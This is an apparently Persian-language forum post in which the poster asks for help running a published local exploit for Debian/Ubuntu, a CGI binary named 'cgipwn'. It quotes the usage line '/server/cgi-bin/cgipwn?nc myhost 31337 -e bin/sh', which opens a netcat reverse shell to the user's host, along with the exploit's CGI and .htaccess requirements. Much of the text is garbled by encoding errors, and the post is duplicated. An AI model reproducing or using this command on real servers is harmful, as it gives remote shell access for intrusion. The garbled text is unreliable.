سلام دوستان
مدتي پيش با آمدن آسيب پذيري در دبيان و اوبنتو و اکسپلوييت منتشر شده ي اون به يه مشکلي برخورم:
خود لوکال اينجاست
يکم قضيه رو پيچونده
ميگه که در دايرکتوري /cgi-bin/ با gcc کامپايل کنيد و پورت دلخواهتون رو ليستن کنيد
Ùˆ طريقه ÙŠ استÙاده:
اين نوع استÙاده مثل همين نت کت خودمونه اما تو کد ها Ùکر نکنم واقعا بتونه Connect Back کنه
در ضمن
اينجا نوشته که:
.
Ùکر کنم ميگه تنظيمات Ùايل .htaccess رو براي Execute کردن تغيير بديد (اينجا رو Ùکر کنم آقا ممد بتونه Ú©Ù…Ú©Ù… کنه)
اينجر Ú©Ù‡ نوشته ما بايد يه CGI Execution با دسترسي بالا مثل rOOT ايجاد کنيم Ú©Ù‡ اجازه ÙŠ تغيير Ùايل رو براي اجرا کاماند بده
اميدوارم منظورم رو خوب رسونده باشم
مدتي پيش با آمدن آسيب پذيري در دبيان و اوبنتو و اکسپلوييت منتشر شده ي اون به يه مشکلي برخورم:
خود لوکال اينجاست
يکم قضيه رو پيچونده
ميگه که در دايرکتوري /cgi-bin/ با gcc کامپايل کنيد و پورت دلخواهتون رو ليستن کنيد
Ùˆ طريقه ÙŠ استÙاده:
کد:
/server/cgi-bin/cgipwn?nc myhost 31337 -e bin/sh
در ضمن
اينجا نوشته که:
کد:
Must have CGI execution privileges and service started manually by root via shell. Also try adding "Options +ExecCGI" to your .htaccess file
Ùکر کنم ميگه تنظيمات Ùايل .htaccess رو براي Execute کردن تغيير بديد (اينجا رو Ùکر کنم آقا ممد بتونه Ú©Ù…Ú©Ù… کنه)
اينجر Ú©Ù‡ نوشته ما بايد يه CGI Execution با دسترسي بالا مثل rOOT ايجاد کنيم Ú©Ù‡ اجازه ÙŠ تغيير Ùايل رو براي اجرا کاماند بده
اميدوارم منظورم رو خوب رسونده باشم
Comment